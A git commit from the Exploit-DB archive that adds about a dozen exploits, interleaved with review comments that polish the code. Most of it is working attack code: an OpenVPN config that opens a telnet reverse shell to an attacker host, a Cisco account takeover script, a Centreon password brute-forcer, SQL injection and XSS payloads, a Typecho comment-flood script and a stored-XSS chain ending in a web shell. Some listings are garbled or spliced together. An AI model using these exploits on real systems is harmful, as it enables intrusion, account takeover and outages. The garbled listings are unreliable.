From 9d3e200bec6e0243cd4bb303aafd791349ad0ad0 Mon Sep 17 00:00:00 2001 From: Exploit-DB Date: Fri, 11 Apr 2025 00:17:01 +0000 Subject: [PATCH] DB: 2025-04-11 12 changes to exploits/shellcodes/ghdb Cosy+ firmware 21.2s7 - Command Injection K7 Ultimate Security K7RKScan.sys 17.0.2019 - Denial Of Service (DoS) Cisco Smart Software Manager On-Prem 8-202206 - Account Takeover AquilaCMS 1.409.20 - Remote Command Execution (RCE) Centron 19.04 - Remote Code Execution (RCE) CodeAstro Online Railway Reservation System 1.0 - Cross Site Scripting (XSS) Feng Office 3.11.1.2 - SQL Injection flatCore 1.5.5 - Arbitrary File Upload PandoraFMS 7.0NG.772 - SQL Injection Typecho 1.3.0 - Race Condition Typecho 1.3.0 - Stored Cross-Site Scripting (XSS) --- exploits/multiple/hardware/52160.py | 53 ++++++ exploits/multiple/remote/52158.py | 92 ++++++++++ exploits/multiple/webapps/52155.py | 118 +++++++++++++ exploits/php/webapps/52154.NA | 29 ++++ exploits/php/webapps/52156.py | 101 +++++++++++ exploits/php/webapps/52157.py | 136 +++++++++++++++ exploits/php/webapps/52159.txt | 24 +++ exploits/php/webapps/52161.go | 182 ++++++++++++++++++++ exploits/php/webapps/52162.go | 254 ++++++++++++++++++++++++++++ exploits/php/webapps/52164.py | 197 +++++++++++++++++++++ exploits/php/webapps/52165.txt | 78 +++++++++ files_exploits.csv | 11 ++ 12 files changed, 1275 insertions(+) create mode 100755 exploits/multiple/hardware/52160.py create mode 100755 exploits/multiple/remote/52158.py create mode 100755 exploits/multiple/webapps/52155.py create mode 100644 exploits/php/webapps/52154.NA create mode 100755 exploits/php/webapps/52156.py create mode 100755 exploits/php/webapps/52157.py create mode 100644 exploits/php/webapps/52159.txt create mode 100755 exploits/php/webapps/52161.go create mode 100755 exploits/php/webapps/52162.go create mode 100755 exploits/php/webapps/52164.py create mode 100644 exploits/php/webapps/52165.txt 
diff --git a/exploits/multiple/hardware/52160.py b/exploits/multiple/hardware/52160.py
new file mode 100755
index 000000000..c7547b09a
--- /dev/null
+++ b/exploits/multiple/hardware/52160.py
@@ -0,0 +1,53 @@ +Hey, + +Overview: The Ewon Cosy+ is a VPN gateway used for remote access and +maintenance in industrial environments. The manufacturer describes the +product as follows (see [1]): "The Ewon Cosy+ gateway establishes a secure +VPN connection between the machine (PLC, HMI, or other devices) and the +remote engineer. The connection happens through Talk2m, a highly secured +industrial cloud service. The Ewon Cosy+ makes industrial remote access +easy and secure like never before!" Due to improper neutralization of +parameters read from a user-controlled configuration file, an authenticated +attacker is able to inject and execute OS commands on the device. + +Vulnerability Details: Authenticated attackers are able to upload a custom +OpenVPN configuration. This configuration can contain the OpenVPN +paramaters "--up" and "--down", which execute a specified script or +executable. Since the process itself runs with the highest privileges +(root), this allows the device to be completely compromised. 
+ + +PoC: +# Exploit Title: Ewon Cosy+ Command Injection +# Google Dork: N/A +# Date: 2024-8-20 +# Exploit Author: CodeB0ss +# Contact: t.me/codeb0ss / uncodeboss@gmail.com +# Version: 21.2s7 + # Tested on: Windows 11 Home Edition + # CVE: CVE-2024-33896 + + +import socket +import subprocess +import time + +def configcreator(file_path): + with open(file_path, 'w') as f: f.write( """ client dev tun persist-tun +proto tcp verb 5 mute 20 --up '/bin/sh -c "TF=$(mktemp -u);mkfifo +$TF;telnet {attacker_ip} 5000 0<$TF | sh 1>$TF"' script-security 2 """) def +l3st(port): server_socket = socket.socket(socket.AF_INET, +socket.SOCK_STREAM) server_socket.bind(('0.0.0.0', port)) +server_socket.listen(1) print(f" - --> Listening_0n_port {port}") +client_socket, _ = server_socket.accept() print(" - --> Recevied") while +True: data = client_socket.recv(1024) if not data: break +print(data.decode()) client_socket.close() server_socket.close() if name == +"main": IP = '127.0.0.1' config = '/path/to/malicious_config.ovpn' port = +5000 listener_process = subprocess.Popen(['python', '-c', f'from main +import start_listener; start_listener({port})']) time.sleep(2) +create_malicious_openvpn_config(config) print(f" - --> config_created +{config}") + + +GitHub: +https://github.com/codeb0ss/CVE-2024-33896-PoC \ No newline at end of file diff --git a/exploits/multiple/remote/52158.py b/exploits/multiple/remote/52158.py new file mode 100755 index 000000000..f4aff74c9 --- /dev/null +++ b/exploits/multiple/remote/52158.py 
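Review bot: The advisory prose quotes the vendor "(see [1])" but the hunk carries no reference list, and neither the prose nor the PoC header states a fixed firmware version or any mitigation, so a reader cannot tell whether 21.2s7 is the last affected build. Add a references line resolving [1] and a header such as `# Fixed in: <FIXED-VERSION — confirm against the vendor advisory>` once verified. The header's `# Tested on: Windows 11 Home Edition` also sits oddly beside a gateway-side payload; it is worth stating whether that refers to the operator host rather than the device. The listing itself appears to have lost its line structure in transit, so it should be compared against the GitHub repository it links before being relied on as a faithful copy.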
@@ -0,0 +1,92 @@ +# Title: K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference +# Date: 13.08.2024 +# Author: M. Akil Gündoğan +# Vendor Homepage: https://k7computing.com/ +# Version: < v17.0.2019 +# Tested on: Windows 10 Pro x64 +# CVE ID: CVE-2024-36424 + +# Vulnerability Description: +-------------------------------------- +In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group. + +# Technical details and step by step Proof of Concept's (PoC): +-------------------------------------- +1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create. + +2 - Compile the attached PoC code written in C++ as release on VS 2022. + +3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD. + +# Impact: +-------------------------------------- +An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system. + +# Advisories: +-------------------------------------- +K7 Computing recommends that all customers update their products to the corresponding versions shown below: + +K7 Ultimate Security (17.0.2019 or Higher) + +# Timeline: +-------------------------------------- +- 16.05.2024 - Vulnerability reported. +- 05.08.2024 - Vendor has fixed the vulnerability. +- 13.08.2024 - Released. 
+ +# References: +-------------------------------------- +- Vendor: https://www.k7computing.com +- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417 +- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424 +- Repository: https://github.com/secunnix/CVE-2024-36424 + +# PoC Code (C++): +------------------------------------------------------------------------------------------------------------------------- + +/* +# Usage: Only compile it and run, boooom :) +*/ + +#include +#include + +const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path +const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014 + +int main() { + std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl; + HANDLE hDevice = CreateFile(driverDevice.c_str(), + GENERIC_READ | GENERIC_WRITE, + 0, + nullptr, + OPEN_EXISTING, + 0, + nullptr); + + if (hDevice == INVALID_HANDLE_VALUE) { + std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl; + return 1; + } + + void* inputBuffer = nullptr; // Null input buffer + DWORD inputBufferSize = 0; + + DWORD bytesReturned; + BOOL result = DeviceIoControl(hDevice, + ioCTL, + inputBuffer, + inputBufferSize, + nullptr, + 0, + &bytesReturned, + nullptr); + + if (!result) { + std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl; + } + + CloseHandle(hDevice); + + return 0; +} \ No newline at end of file diff --git a/exploits/multiple/webapps/52155.py b/exploits/multiple/webapps/52155.py new file mode 100755 index 000000000..446f29b82 --- /dev/null +++ b/exploits/multiple/webapps/52155.py 
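Review bot: The file is a C++ proof of concept committed under a `.py` path (`exploits/multiple/remote/52158.py`) and, by its own description, a local null-pointer-dereference DoS rather than a remote issue, so both the extension and the `remote/` directory mislead anyone filtering the database by language or attack vector. The two `#include` lines in the hunk are empty — the header names were most likely stripped together with their angle brackets during import — so the listing no longer matches what the author compiled; it should be restored from the repository linked under References rather than reconstructed by guesswork. Minor: the banner string spells `Ultimae`.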
@@ -0,0 +1,118 @@ +# Exploit Title: Cisco SSM On-Prem; Account Takeover (CVE-2024-20419) +# Google Dork: N/A +# Date: 21/07/2024 +# Exploit Author: Mohammed Adel +# Vendor Homepage: https://www.cisco.com +# Software Link: +https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html +# Version: 8-202206 and earlier +# Tested on: Kali Linux +# CVE : CVE-2024-20419 +# Security Advisory: +https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cssm-auth-sLw3uhUy +# Technical Analysis: https://www.0xpolar.com/blog/CVE-2024-20419 + + +import requests, sys +from urllib.parse import unquote + +# Suppress SSL warnings +requests.packages.urllib3.disable_warnings() + +Domain = sys.argv[1] # Domain, https://0xpolar.com:8443 +Username = sys.argv[2] # Username, by default its [admin] +password = "Polar@123456780" + +print("[*] Cisco Smart Software Manager On-Prem") +print("[*] Account Takeover Exploit") +print("[*] Target: "+Domain) +print("[*] Username: "+Username) +print("\n") + +print("[*] Getting Necessary Tokens..") +get_url = Domain+"/backend/settings/oauth_adfs?hostname=polar" + +response = requests.get(get_url, verify=False) + +def get_cookie_value(headers, cookie_name): + cookies = headers.get('Set-Cookie', '').split(',') + for cookie in cookies: + if cookie_name in cookie: + parts = cookie.split(';') + for part in parts: + if cookie_name in part: + return part.split('=')[1].strip() + return None + +set_cookie_headers = response.headers.get('Set-Cookie', '') + +xsrf_token = get_cookie_value(response.headers, 'XSRF-TOKEN') +lic_engine_session = get_cookie_value(response.headers, '_lic_engine_session') + +if xsrf_token: + xsrf_token = unquote(xsrf_token) + +if not lic_engine_session or not xsrf_token: + print("Required cookies not found in the response.") +else: + print("[+] lic_engine_session: "+lic_engine_session) + print("[+] xsrf_token: "+xsrf_token) + print("\n[*] 
Generating Auth Token") + post_url = Domain+"/backend/reset_password/generate_code" + + headers = { + 'Accept': 'application/json', + 'Content-Type': 'application/json', + 'X-Xsrf-Token': xsrf_token, + 'Sec-Ch-Ua': '', + 'Sec-Ch-Ua-Mobile': '?0', + } + cookies = { + '_lic_engine_session': lic_engine_session, + 'XSRF-TOKEN': xsrf_token, + } + + payload = { + 'uid': Username + } + + post_response = requests.post(post_url, headers=headers, cookies=cookies, json=payload, verify=False) + + post_response_json = post_response.json() + auth_token = post_response_json.get('auth_token') + + if not auth_token: + print("auth_token not found in the response.") + else: + print("[+] Auth Token: "+auth_token) + print("\n[*] Setting Up a New Password") + final_post_url = Domain+"/backend/reset_password" + + final_headers = { + 'Accept': 'application/json', + 'Content-Type': 'application/json', + 'X-Xsrf-Token': xsrf_token, + } + final_cookies = { + '_lic_engine_session': lic_engine_session, + 'XSRF-TOKEN': xsrf_token, + } + + final_payload = { + 'uid': Username, + 'auth_token': auth_token, + 'password': password, + 'password_confirmation': password, + 'common_name': '' + } + + final_post_response = requests.post(final_post_url, headers=final_headers, cookies=final_cookies, json=final_payload, verify=False) + response_text = final_post_response.text + + if "OK" in response_text: + print("[+] Password Successfully Changed!") + print("[+] Username: "+Username) + print("[+] New Password: "+password) + else: + print("[!] Something Went Wrong") + print(response_text) \ No newline at end of file diff --git a/exploits/php/webapps/52154.NA b/exploits/php/webapps/52154.NA new file mode 100644 index 000000000..a03d1e141 --- /dev/null +++ b/exploits/php/webapps/52154.NA 
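Review bot: `Domain = sys.argv[1]` and `Username = sys.argv[2]` are read with no argument check, so a run without both positional arguments dies with a bare `IndexError` instead of a usage line; a guard such as `if len(sys.argv) != 3: sys.exit(f"usage: {sys.argv[0]} <base-url> <username>")` placed before those assignments would document the interface that the header only implies in comments. `set_cookie_headers` is assigned from `response.headers` and never used afterwards, and the module runs entirely at import time with no `if __name__ == "__main__":` guard. The advisory block links the Cisco bulletin but gives no fixed release, so a `# Fixed in:` line would help readers triaging versions.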
@@ -0,0 +1,29 @@ +# Exploit Title: Blind SQL Injection - FengOffice +# Date: 7/2024 +# Exploit Author: Andrey Stoykov +# Version: 3.11.1.2 +# Tested on: Ubuntu 22.04 +# Blog: http://msecureltd.blogspot.com + + +SQL Injection: + +1. Login to application +2. Click on "Workspaces" +3. Copy full URL +4. Paste the HTTP GET request into text file +5. Set the injection point to be in the "dim" parameter value +6. Use SQLMap to automate the process + +sqlmap -r request.txt --threads 1 --level 5 --risk 3 --dbms=3Dmysql -p dim = +--fingerprint + +[...] +[12:13:03] [INFO] confirming MySQL +[12:13:04] [INFO] the back-end DBMS is MySQL +[12:13:04] [INFO] actively fingerprinting MySQL +[12:13:05] [INFO] executing MySQL comment injection fingerprint +web application technology: Apache +back-end DBMS: active fingerprint: MySQL >=3D 5.7 + comment injection fingerprint: MySQL 5.7.37 +[...] \ No newline at end of file diff --git a/exploits/php/webapps/52156.py b/exploits/php/webapps/52156.py new file mode 100755 index 000000000..40084ad8e --- /dev/null +++ b/exploits/php/webapps/52156.py 
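Review bot: The sqlmap command line carries quoted-printable residue from a mail export: `=3D` stands for `=` in `--dbms=3Dmysql` and in the fingerprint output `MySQL >=3D 5.7`, and the lone `=` ending the command line is a soft line break, so `--fingerprint` belongs on the same line. The header gives no fixed version and no vendor reference beyond the author's blog, so a reader cannot tell whether 3.11.1.2 is the last affected Feng Office release; add a `# Fixed in: <version — confirm with vendor>` line once known. The file is also committed with a `.NA` extension while its siblings use `.txt` for text advisories.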
@@ -0,0 +1,101 @@ +#!/usr/bin/env python3 +# Tested on Centreon API 19.04.0 +# Centreon 19.04 - Login Password Bruteforcer +# Written on 6 Nov 2019 +# Referencing API Authentication of the Centreon API document +# Author: st4rry +# centbruteon.py +# Centreon Download Link: https://download.centreon.com/#version-Older +# Dependencies: sys, requests, argparse, termcolor, os + +import sys +import requests +import argparse +from termcolor import colored +import os + +def main(): + parser = argparse.ArgumentParser() + parser.add_argument('-u', dest='host', help='Define your target URL', required=True) + parser.add_argument('-p', dest='port', type=int, help='Specify port number', default=80) + parser.add_argument('--https', dest='https', action='store_true', help='Use HTTPS instead of HTTP') + parser.add_argument('-l', dest='username', help='Specific username') + parser.add_argument('-L', dest='userfile', type=argparse.FileType('r'), help='Username wordlist') + parser.add_argument('-w', dest='passwfile', type=argparse.FileType('r'), help='Specify Password wordlist', required=True) + parser.add_argument('--insecure', action='store_true', help='Skip SSL certificate verification') + parser.add_argument('--ca-bundle', dest='ca_bundle', help='Path to custom CA bundle') + + if len(sys.argv) == 1: + parser.print_help(sys.stderr) + sys.exit(1) + + args = parser.parse_args() + + protocol = 'https' if args.https else 'http' + server = f"{protocol}://{args.host}:{args.port}" + user = args.username + passfile = args.passwfile.read().splitlines() + userfile = args.userfile + dirlo = '/centreon/api/index.php?action=authenticate' + verify_ssl = not args.insecure + + if args.ca_bundle: + verify_ssl = args.ca_bundle + + if user: + brute_force_single_user(server, user, passfile, dirlo, verify_ssl) + elif userfile: + usrwl = userfile.read().splitlines() + brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl) + else: + print(colored('Something went wrong!', 'red')) + 
sys.exit(1) + +def brute_force_single_user(server, user, passfile, dirlo, verify_ssl): + for password in passfile: + data = {'username': user, 'password': password} + r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) + + try: + print('Processing...') + print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + + colored(' Username: ', 'yellow') + colored(user, 'yellow') + + colored(' Password: ', 'yellow') + colored(password, 'yellow')) + + if r.status_code == 200: + print(colored('Credentials found: username: ', 'green') + colored(user, 'green') + + colored(' password: ', 'green') + colored(password, 'green') + + colored(' server: ', 'green') + colored(server, 'green')) + print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) + print('\n') + break + else: + print(colored('403 - Unauthenticated!', 'red')) + except IndexError: + print(colored('Something went wrong', 'red')) + +def brute_force_multiple_users(server, usrwl, passfile, dirlo, verify_ssl): + for usr in usrwl: + for password in passfile: + data = {'username': usr, 'password': password} + r = requests.post(f'{server}{dirlo}', data=data, verify=verify_ssl) + + try: + print('Processing...') + print(colored('Brute forcing on Server: ', 'yellow') + colored(server, 'yellow') + + colored(' Username: ', 'yellow') + colored(usr, 'yellow') + + colored(' Password: ', 'yellow') + colored(password, 'yellow')) + + if r.status_code == 200: + print(colored('Credentials found: username: ', 'green') + colored(usr, 'green') + + colored(' password: ', 'green') + colored(password, 'green') + + colored(' server: ', 'green') + colored(server, 'green')) + print(colored('Token: ', 'cyan') + colored(r.content.decode(), 'cyan')) + print('\n') + else: + print(colored('403 - Unauthenticated!', 'red')) + except IndexError: + print(colored('Something went wrong', 'red')) + +if __name__ == '__main__': + main() \ No newline at end of file 
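Review bot: `brute_force_single_user` and `brute_force_multiple_users` are the same loop body duplicated line for line, differing only in the `break` after a hit; the single-user variant could be expressed as a call to the multi-user one with `[user]` (returning after the first success), which removes about twenty near-identical lines. The `try/except IndexError` in both functions wraps only `print` calls and can never fire, and every non-200 status is reported as `403 - Unauthenticated!` whatever the actual code was. Separately, the commit subject lists this entry as "Centron 19.04 - Remote Code Execution (RCE)" while the file header describes a "Login Password Bruteforcer"; one of the two titles is wrong.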
diff --git a/exploits/php/webapps/52157.py b/exploits/php/webapps/52157.py
new file mode 100755
index 000000000..7c9b39d0a
--- /dev/null
+++ b/exploits/php/webapps/52157.py
@@ -0,0 +1,136 @@ +# Exploit Title: PandoraFMS console v7.0NG.772 - SQL Injection (Authenticated) +# Date: 21/11/2023 +# Exploit Author: Osama Yousef +# Vendor Homepage: https://pandorafms.com/ +# Software Link: https://github.com/pandorafms/pandorafms/releases/download/v772-LTS/pandorafms_agent_linux-7.0NG.772.tar.gz +# Version: v7.0NG.772 +# Tested on: Linux +# CVE : CVE-2023-44088 + +import re, requests, argparse, string, random, base64 +import urllib3 +import html + +headers = { + 'Cache-Control': 'max-age=0', + 'Origin': '', + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.93 Safari/537.36', + 'Accept': '*/*', + 'Referer': '' +} + +def login(session, url, username, password): + res = session.get(url) + csrf = retrieve_csrftoken(res.text) + + url+= '?login=1' + payload = "nick={}&pass={}&login_button=Let%27s+go&csrf_code={}" + + res = session.post(url, data=payload.format(username, password, csrf), headers={'Content-Type': 'application/x-www-form-urlencoded'}) + if 'User is blocked' in res.text: + print("Login Failed!") + exit(1) + + +def exploit(session, url, imagepath, query): + url1 = url + "?sec=network&sec2=godmode/reporting/visual_console_builder&tab=data" + name = random_id(10) + payload = "{}.jpg',({}),'1','1','1','1');-- helloo.jpg".format(name, query) + payload=payload.replace(' ', '\t') + files = {"background_image": (payload, open(imagepath, 'rb').read(), 'image/jpeg')} + + # Create a reference to the original _make_request method + urllib3.connectionpool.HTTPConnectionPool._original_make_request = urllib3.connectionpool.HTTPConnectionPool._make_request + # Replace the _make_request method with the custom_make_request function + urllib3.connectionpool.HTTPConnectionPool._make_request = custom_make_request + + + res = session.post(url1, files=files, data={'action':'save', 'name':name, 'id_group': 0, 'background_image': 'None.png', 'background_color': '#ffffff', 'width': '1024', 
'height': '768', 'is_favourite_sent': '0', 'auto_adjust_sent': '0', 'update_layout': 'Save'}) + + if 'Created successfully' not in res.text: + print("Failed to create a visual console!") + exit(1) + + + url2 = url + "?sec=godmode/reporting/map_builder&sec2=godmode/reporting/map_builder" + res = session.get(url2) + x = re.search('(?:)'+name, res.text) + match = x.group() + url3 = match.lstrip("alert(document.cookie)` +3. Upon execution, the script will trigger and display the user's cookies +in an alert box. + +## Mitigation: +To prevent this vulnerability, ensure that all user inputs are properly +sanitized and validated before being reflected back on the webpage. \ No newline at end of file diff --git a/exploits/php/webapps/52161.go b/exploits/php/webapps/52161.go new file mode 100755 index 000000000..3ff4dfaed --- /dev/null +++ b/exploits/php/webapps/52161.go 
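Review bot: `open(imagepath, 'rb').read()` in `exploit` leaves the file handle to the garbage collector; `with open(imagepath, 'rb') as fh: image = fh.read()` before building `files` is the idiomatic form. The monkeypatch of `urllib3.connectionpool.HTTPConnectionPool._make_request` assigns `custom_make_request`, which is not defined anywhere visible in this hunk, and the hunk itself is truncated in this rendering — the text after `match.lstrip(` runs straight into the body of `52159.txt` with no file header in between — so the tail of `52157.py` and the header of `52159.txt` should be checked against the repository before this listing is trusted.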
@@ -0,0 +1,182 @@ +// Exploit Title: Typecho <= 1.3.0 Race Condition +// Google Dork: intext:"Powered by Typecho" inurl:/index.php +// Date: 18/08/2024 +// Exploit Author: Michele 'cyberaz0r' Di Bonaventura +// Vendor Homepage: https://typecho.org +// Software Link: https://github.com/typecho/typecho +// Version: 1.3.0 +// Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho) +// CVE: CVE-2024-35539 + +// For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/ + +package main + +import ( + "bytes" + "fmt" + "io" + "net/http" + "net/url" + "os" + "strings" + "sync" + "sync/atomic" + "time" + + "github.com/robertkrimen/otto" +) + +var ( + c int32 = 0 + commentsPostInterval int64 = 60 + maxThreads int = 1000 + wg sync.WaitGroup + userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" + client *http.Client = &http.Client{ + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } +) + +func getJSFunction(u string) string { + req, err := http.NewRequest("GET", u, nil) + if err != nil { + fmt.Println("[X] Error creating initial request:", err) + return "" + } + + req.Header.Set("User-Agent", userAgent) + resp, err := client.Do(req) + if err != nil { + fmt.Println("[X] Error sending initial request:", err) + return "" + } + + buf := new(bytes.Buffer) + buf.ReadFrom(resp.Body) + body := buf.String() + + if !strings.Contains(body, "input.value = (") || !strings.Contains(body, ")();;") { + fmt.Println("[X] Error finding JavaScript function") + return "" + } + + jsFunction := strings.Split(body, "input.value = (")[1] + jsFunction = strings.Split(jsFunction, ")();;")[0] + + return jsFunction +} + +func executeJavaScript(jsFunctionName string, jsFunctionBody string) string { + vm := otto.New() + + _, err := vm.Run(jsFunctionBody) + if err != nil { + 
fmt.Println("[X] Error executing JavaScript function:", err) + return "" + } + + result, err := vm.Call(jsFunctionName, nil) + if err != nil { + fmt.Println("[X] Error calling JavaScript function:", err) + return "" + } + + returnValue, err := result.ToString() + if err != nil { + fmt.Println("[X] Error converting JavaScript result to string:", err) + return "" + } + + return returnValue +} + +func spamComments(u string, formToken string) { + timestamp := time.Now().Unix() + for { + i := 0 + + for time.Now().Unix() < timestamp-1 { + time.Sleep(250 * time.Millisecond) + fmt.Printf("\r[*] Waiting for next spam wave... (%d seconds) ", timestamp-time.Now().Unix()-1) + } + + fmt.Printf("\n") + for time.Now().Unix() < timestamp+2 { + if i < maxThreads { + wg.Add(1) + go spamRequest(u, formToken, i) + i++ + } + } + + wg.Wait() + fmt.Printf("\n[+] Successfully spammed %d comments\n", c) + timestamp = time.Now().Unix() + commentsPostInterval + } +} + +func spamRequest(u string, formToken string, i int) { + fmt.Printf("\r[*] Spamming comment request %d ", i) + + defer wg.Done() + + formData := url.Values{} + formData.Set("_", formToken) + formData.Set("author", fmt.Sprintf("user_%d", i)) + formData.Set("mail", fmt.Sprintf("user%d@test.example", i)) + formData.Set("text", fmt.Sprintf("Hello from user_%d", i)) + + req, err := http.NewRequest("POST", u+"comment", nil) + if err != nil { + return + } + + req.Header.Set("Referer", u) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("Content-Type", "application/x-www-form-urlencoded") + req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) + req.Body = io.NopCloser(strings.NewReader(formData.Encode())) + + resp, err := client.Do(req) + if err != nil { + return + } + + if resp.StatusCode == 302 { + atomic.AddInt32(&c, 1) + } + + defer resp.Body.Close() +} + +func main() { + if len(os.Args) != 2 { + fmt.Println("Usage: go run CVE-2024-35538.go ") + return + } + + fmt.Println("[+] Starting Typecho <= 1.3.0 
Race Condition exploit (CVE-2024-35539) by cyberaz0r") + + targetUrl := os.Args[1] + fmt.Println("[+] Spam target:", targetUrl) + + fmt.Println("[*] Getting JavaScript function to calculate form token...") + jsFunction := getJSFunction(targetUrl) + if jsFunction == "" { + fmt.Println("[-] Could not get JavaScript function, exiting...") + return + } + + fmt.Println("[*] Evaluating JavaScript function to calculate form token...") + formToken := executeJavaScript("calculateToken", strings.Replace(jsFunction, "function ()", "function calculateToken()", 1)) + if formToken == "" { + fmt.Println("[-] Could not get form token, exiting...") + return + } + + fmt.Printf("[+] Form token: %s", formToken) + spamComments(targetUrl, formToken) +} \ No newline at end of file diff --git a/exploits/php/webapps/52162.go b/exploits/php/webapps/52162.go new file mode 100755 index 000000000..0ebfbb166 --- /dev/null +++ b/exploits/php/webapps/52162.go 
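Review bot: The usage string in `main` names the file `CVE-2024-35538.go` while the header comment and the banner both say CVE-2024-35539; the line should read `fmt.Println("Usage: go run CVE-2024-35539.go <url>")` (the argument placeholder that presumably followed the file name was likely stripped as an HTML-looking token in this rendering). In `getJSFunction` the response body is consumed with `buf.ReadFrom(resp.Body)` but never closed and the read error is discarded; a `defer resp.Body.Close()` after the `client.Do` error check matches what `spamRequest` already does. `spamComments` never returns, so the program has no clean exit path other than an interrupt.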
@@ -0,0 +1,254 @@ +// Exploit Title: Typecho <= 1.3.0 Stored Cross-Site Scripting (XSS) +// Google Dork: intext:"Powered by Typecho" inurl:/index.php +// Date: 18/08/2024 +// Exploit Author: Michele 'cyberaz0r' Di Bonaventura +// Vendor Homepage: https://typecho.org +// Software Link: https://github.com/typecho/typecho +// Version: 1.3.0 +// Tested on: Typecho 1.3.0 Docker Image with PHP 7.4 (https://hub.docker.com/r/joyqi/typecho) +// CVE: CVE-2024-35540 + +// For more information, visit the blog post: https://cyberaz0r.info/2024/08/typecho-multiple-vulnerabilities/ + +package main + +import ( + "bufio" + "bytes" + "crypto/rand" + "crypto/sha256" + "encoding/base64" + "fmt" + "net/http" + "net/url" + "os" + "strings" + "time" +) + +var ( + postTitle string = "Reflected XSS PoC" + postText string = "Hey admin! Look at the draft of this blog post, can I publish it?" + userAgent string = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" + client *http.Client = &http.Client{ + CheckRedirect: func(req *http.Request, via []*http.Request) error { + return http.ErrUseLastResponse + }, + } +) + +func getEditUrl(u string, cookies string) string { + req, err := http.NewRequest("GET", u+"/admin/write-post.php", nil) + if err != nil { + fmt.Println("[X] Error creating initial request:", err) + return "" + } + + req.Header.Set("Cookie", cookies) + req.Header.Set("User-Agent", userAgent) + + resp, err := client.Do(req) + if err != nil { + fmt.Println("[X] Error sending initial request:", err) + return "" + } + + buf := new(bytes.Buffer) + buf.ReadFrom(resp.Body) + body := buf.String() + + if !strings.Contains(body, "
{ + var textarea = i.contentWindow.document.getElementById('content'); + if (textarea.value.includes(payload)) + return; + + textarea.value = textarea.value.replace(/<\?php/, '][1]\n[1]: https://google.com", jsCodeEncoded) +} + +func createPost(u string, cookies string, payload string) string { + formData := url.Values{} + formData.Set("title", postTitle) + formData.Set("text", payload+"\n"+postText) + formData.Set("do", "save") + formData.Set("markdown", "1") + formData.Set("category%5B%5D", "1") + formData.Set("allowComment", "1") + formData.Set("allowPing", "1") + formData.Set("allowFeed", "1") + formData.Set("dst", "60") + formData.Set("timezone", "7200") + + req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode())) + if err != nil { + fmt.Println("[X] Error creating malicious post creation request:", err) + return "" + } + + req.Header.Set("Cookie", cookies) + req.Header.Set("User-Agent", userAgent) + req.Header.Set("Content-Type", "application/x-www-form-urlencoded") + req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) + req.Header.Set("Referer", strings.Replace(strings.Split(u, ".php")[0], "index", "admin/write-post.php", 1)) + + resp, err := client.Do(req) + if err != nil { + fmt.Println("[X] Error sending malicious post creation request:", err) + return "" + } + + defer resp.Body.Close() + return resp.Header.Get("Location") +} + +func checkInjected(u string) bool { + req, err := http.NewRequest("HEAD", u, nil) + if err != nil { + return false + } + + req.Header.Set("User-Agent", userAgent) + + resp, err := client.Do(req) + if err != nil { + return false + } + + return resp.Header.Get("X-Random-Token") != "" +} + +func readInput() string { + scanner := bufio.NewScanner(os.Stdin) + if scanner.Scan() { + return scanner.Text() + } + return "" +} + +func interactiveShell(u string, password string) { + for { + fmt.Print("$ ") + cmd := readInput() + + formData := url.Values{} + formData.Set("CSRFToken", password) + 
formData.Set("action", cmd) + + req, err := http.NewRequest("POST", u, strings.NewReader(formData.Encode())) + if err != nil { + fmt.Println("[X] Error creating shell request:", err) + continue + } + + req.Header.Set("User-Agent", userAgent) + req.Header.Set("Content-Type", "application/x-www-form-urlencoded") + req.Header.Set("Content-Length", fmt.Sprint(len(formData.Encode()))) + + resp, err := client.Do(req) + if err != nil { + fmt.Println("[X] Error sending shell request:", err) + continue + } + + buf := new(bytes.Buffer) + buf.ReadFrom(resp.Body) + body := buf.String() + + fmt.Println(body) + } +} + +func main() { + if len(os.Args) != 3 { + fmt.Println("Usage: go run CVE-2024-35540.go ") + os.Exit(1) + } + + fmt.Println("[+] Starting Typecho <= 1.3.0 Stored XSS exploit (CVE-2024-35540) by cyberaz0r") + + targetUrl := os.Args[1] + cookies := os.Args[2] + + fmt.Println("[*] Getting post edit URL with CSRF token...") + editUrl := getEditUrl(targetUrl, cookies) + if editUrl == "" { + fmt.Println("[-] Could not get post edit URL, exiting...") + return + } + + fmt.Println("[+] 